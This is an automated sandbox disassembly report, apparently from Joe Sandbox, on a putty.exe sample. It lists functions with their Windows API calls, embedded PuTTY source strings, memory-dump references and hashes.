Opcode Fuzzy Hash: c53fec7fff811f6bb79265c08811edeec95500fd11b080b5312f59ea6d46d473
Instruction Fuzzy Hash: 5F41F332A0954186EA62CB19EB94B7EB750FB48B90F156230CF1983BA4DF3DE8458F00

Function 00007FF6BB289C50 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00007FF6BB289C91
GetSysColor.USER32 ref: 00007FF6BB289CE5
GetSysColor.USER32 ref: 00007FF6BB289D39
GetSysColor.USER32 ref: 00007FF6BB289D62

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: 217ffbfbbca57e0f98a7bd9ebae0c02fa65dafaf6720f8fc0dea7ed2a10c52aa
Instruction ID: 6120d53992b453311a57d29b96a14f11099244dea7ea803e2508c90b5f739e59
Opcode Fuzzy Hash: 217ffbfbbca57e0f98a7bd9ebae0c02fa65dafaf6720f8fc0dea7ed2a10c52aa
Instruction Fuzzy Hash: 6631900214C2C54AE735D3A968111EF6A11EBDD384F44027AEBCD83B9BDD3CC606CB99

Function 00007FF6BB281F89 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2AB8E0: DestroyWindow.USER32 ref: 00007FF6BB2AB8F7

InvalidateRect.USER32 ref: 00007FF6BB281FF6
GetClientRect.USER32 ref: 00007FF6BB28200B
InvalidateRect.USER32 ref: 00007FF6BB282093
DefWindowProcW.USER32 ref: 00007FF6BB283732

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Rect$InvalidateWindow$ClientDestroyProc
String ID:
API String ID: 3789280143-0
Opcode ID: 80ad04d1cd51cbcf71c79e559fe8f0604cac8142e46c7db8df3712c76460e334
Instruction ID: 7f6b1eb69ecd9b572cad865a770757133d7ad618f0c295aa055a80c3a19407eb
Opcode Fuzzy Hash: 80ad04d1cd51cbcf71c79e559fe8f0604cac8142e46c7db8df3712c76460e334
Instruction Fuzzy Hash: 0F313B35A085468AEB18DB2DED522BD7691BB8CB54F544035CA4EC7BB6DE7CE4818F00

Function 00007FF6BB286BD0 Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF6BB286C21
DestroyIcon.USER32(00000000,00000000,00000000,00007FF6BB286077,?,?,?,?,00007FF6BB2FA920,?,?,?,?,00007FF6BB2C3528), ref: 00007FF6BB286C32
DeleteObject.GDI32 ref: 00007FF6BB286C5B
CoUninitialize.OLE32(00000000,00000000,00000000,00007FF6BB286077,?,?,?,?,00007FF6BB2FA920,?,?,?,?,00007FF6BB2C3528), ref: 00007FF6BB286C70

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: DeleteObject$DestroyIconUninitialize
String ID:
API String ID: 1128191211-0
Opcode ID: a66b6740aff3e8cf8d15a9e642f8c74887d25acfd22a1c9a1c92b402c24d2bce
Instruction ID: 7b859a8d2d932dafe323d2014f1a68df609d1c331b3481bbbc3707a09c3a267c
Opcode Fuzzy Hash: a66b6740aff3e8cf8d15a9e642f8c74887d25acfd22a1c9a1c92b402c24d2bce
Instruction Fuzzy Hash: D3115E20E09A0394FE19AB6DAE5427D2260BF4CB70F690731DB3ED61F1EE7CA4458701

Function 00007FF6BB28C630 Relevance: 6.0, APIs: 4, Instructions: 28windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00007FF6BB28C63B
GetWindowLongPtrA.USER32 ref: 00007FF6BB28C651
IsZoomed.USER32 ref: 00007FF6BB28C665
SendMessageA.USER32 ref: 00007FF6BB28C68A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Zoomed$LongMessageSendWindow
String ID:
API String ID: 594883883-0
Opcode ID: 7b9bcf54d6ccdb4e873494d79ca2230946a80145f716a9d6eade685b0ae55562
Instruction ID: 39c9a704a1c7d019f5308a2e878a5e92c10c6dc777ec476e4b0b9bdc8a4c4163
Opcode Fuzzy Hash: 7b9bcf54d6ccdb4e873494d79ca2230946a80145f716a9d6eade685b0ae55562
Instruction Fuzzy Hash: B801A414E08A1281FE108B1AED9423E2660FF8DB51F615531CA1ED6BB4DF3DE4858F00

Function 00007FF6BB35E244 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF6BB35E313
GetLastError.KERNEL32 ref: 00007FF6BB35E4CA

Strings

MZx, xrefs: 00007FF6BB35E25B, 00007FF6BB35E327, 00007FF6BB35E38A, 00007FF6BB35E39B, 00007FF6BB35E4DE

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: MZx
API String ID: 1948546556-2575928145
Opcode ID: a9df9c85f04fb2dd16403e166051e429f6c8123a871e395cd67d26eb5e7c112b
Instruction ID: e5bc66093a49529aece94650d8c09784f2964a4f162d1c286155310df2097816
Opcode Fuzzy Hash: a9df9c85f04fb2dd16403e166051e429f6c8123a871e395cd67d26eb5e7c112b
Instruction Fuzzy Hash: 53913562B1C2E685FB219A2C98403BC6B91BB5AB94F184235CB5EC72F5CF3CE446C705

Function 00007FF6BB2C9F10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF6BB2CA19D

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/unicode.c, xrefs: 00007FF6BB2C9FD4
p - mbstr < mblen, xrefs: 00007FF6BB2CA03D, 00007FF6BB2CA07A, 00007FF6BB2CA0EE, 00007FF6BB2CA120

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/unicode.c$p - mbstr < mblen
API String ID: 626452242-1134606155
Opcode ID: e1f5720bcf4309deea2da40c1ac1e7931b163e311a1a09669df6bf7a2a865389
Instruction ID: b2a3a528edee51727802a78a0c28e8c281ff1dfc7dc657aec4c9c164830f4eea
Opcode Fuzzy Hash: e1f5720bcf4309deea2da40c1ac1e7931b163e311a1a09669df6bf7a2a865389
Instruction Fuzzy Hash: B161C322B1D69681FB218B09A65437AB794BB8DB84F440036DF8DC37B9DE7DE444C700

Function 00007FF6BB35D230 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6BB35D347
GetLastError.KERNEL32 ref: 00007FF6BB35D369

Strings

U, xrefs: 00007FF6BB35D2F3

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0c5543f92d4ffb37be7eaca806808697015f89918511715fcd2ed829bb6a8460
Instruction ID: 7a218fda37e0ec2abf8e5c51fe39490e1ea7a374a53d316b8161fe614a317e30
Opcode Fuzzy Hash: 0c5543f92d4ffb37be7eaca806808697015f89918511715fcd2ed829bb6a8460
Instruction Fuzzy Hash: F7419F32B18A4592DB609F29E4447AAB7A0FB98784F554131EF4DC77A8EF3CD441CB44

Function 00007FF6BB2A9A60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9AF6

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9AAE
c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6BB2A9AA7

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2883471717
Opcode ID: 1f8e08e8db5f812005c54b442ea56d0b4140d6f98dd6dbec8a4671db2507f039
Instruction ID: e2159191b4e8e7fe2f9ab6734f8119de3695ce99468283f63b153999c32faa5f
Opcode Fuzzy Hash: 1f8e08e8db5f812005c54b442ea56d0b4140d6f98dd6dbec8a4671db2507f039
Instruction Fuzzy Hash: 49117F32B1552685FB208B0ADA457B93791BB8DB94F458036CF0E877A2DF3DE885CB00

Function 00007FF6BB2A9FD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2AA06B

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2AA02E
c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00007FF6BB2AA027

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
API String ID: 3015471070-795294906
Opcode ID: 0b340bb8710d75010c8b75403d4adb33775eefad0a2dc6dcc00247611cc3728a
Instruction ID: 24967b86c2eae6cd4f9c9f1c82d85b1b25c430143959bf62799fe52b8af9c023
Opcode Fuzzy Hash: 0b340bb8710d75010c8b75403d4adb33775eefad0a2dc6dcc00247611cc3728a
Instruction Fuzzy Hash: C311B122B15609C9FB208B1AD9403B877A0FB4DB99F848135DF4D877A1EE3CE485CB00

Function 00007FF6BB2A9F10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9F9B

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9F6E
c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00007FF6BB2A9F67

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
API String ID: 3015471070-4034055451
Opcode ID: 1324725a9ff61d9b3b6e02095e2f27996e4c3d528beff90453ecb7ce8199f2e5
Instruction ID: c24fc55290c7dcde0b9c8bbc14369af9bbb1a03dbd157b0ea76e7423994fee25
Opcode Fuzzy Hash: 1324725a9ff61d9b3b6e02095e2f27996e4c3d528beff90453ecb7ce8199f2e5
Instruction Fuzzy Hash: D0116D26B19745CAEB218B4AD9413B877A0FB88B94F498035DF4DC77A1EE3CE485CB00

Function 00007FF6BB2A9D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9DD8

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9D9B
c && c->ctrl->type == CTRL_LISTBOX, xrefs: 00007FF6BB2A9D94

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
API String ID: 3015471070-542244468
Opcode ID: 638900d4bbbe74fd839ca0784a1d1c645808873d33638030f784285a59264cf8
Instruction ID: 48e806c03e0389273a994992a8f6c466b64ed428d812067b5a8833920ee8fe03
Opcode Fuzzy Hash: 638900d4bbbe74fd839ca0784a1d1c645808873d33638030f784285a59264cf8
Instruction Fuzzy Hash: 9F11AC22705A09C9EB209B1AD9413B877A0FB8CB89F848435DF4D87761EE7CE485CB40

Function 00007FF6BB2A99B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF6BB2A9A47

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A9A1B
c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00007FF6BB2A9A14

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
API String ID: 3015471070-587671386
Opcode ID: 367a966b6e37a6fdaa1772d553b07fe266872019545f1052af7bd23f7f29b435
Instruction ID: 04fe3318c2f6d5d8a84f9dfe916bfbc057b749555dfedff8db2b9549947154bb
Opcode Fuzzy Hash: 367a966b6e37a6fdaa1772d553b07fe266872019545f1052af7bd23f7f29b435
Instruction Fuzzy Hash: 4E11A036B0465691EA118B0BEA415B97790BB9CBD8F908032DF0D87776EE3CE486CB00

Function 00007FF6BB2B506F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

ClearCommBreak.KERNEL32 ref: 00007FF6BB2B50C8
CloseHandle.KERNEL32 ref: 00007FF6BB2B50D1

Strings

Error writing to serial device, xrefs: 00007FF6BB2B50EC

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: BreakClearCloseCommHandle
String ID: Error writing to serial device
API String ID: 2685284230-3232346394
Opcode ID: 7eb12c439e672dc5fa65efc19690cb1d9c5bd28e323bc0a838643cf16d101334
Instruction ID: 28af4c40f04eb7a029bc0780a872c97a9a10be756976ccdc36e8867a0d97e8d3
Opcode Fuzzy Hash: 7eb12c439e672dc5fa65efc19690cb1d9c5bd28e323bc0a838643cf16d101334
Instruction Fuzzy Hash: C221482660564282EA319B6AE59537D6360FF4CBB0F044631DBAE477F1CF7CE4858741

Function 00007FF6BB286900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32 ref: 00007FF6BB28691F
AppendMenuA.USER32 ref: 00007FF6BB286957

Strings

(No sessions), xrefs: 00007FF6BB286988

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Menu$AppendDelete
String ID: (No sessions)
API String ID: 4109642853-1102551510
Opcode ID: 801d01d003e83d5835a427b18413200aa22ff3f1fe3cd46e5a0b507625d43c59
Instruction ID: 19019109a0cfd2ced26c1ef4581669390139032ac0872a6d1e6717302e40fb62
Opcode Fuzzy Hash: 801d01d003e83d5835a427b18413200aa22ff3f1fe3cd46e5a0b507625d43c59
Instruction Fuzzy Hash: F6113921F0851281FA12C75AEE506B92292FB8D7A5FA94132CF0DD77B1DE7DE4828B40

Function 00007FF6BB2A97F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 00007FF6BB2A9863

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6BB2A984B
c && c->ctrl->type == CTRL_CHECKBOX, xrefs: 00007FF6BB2A9844

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ButtonChecked
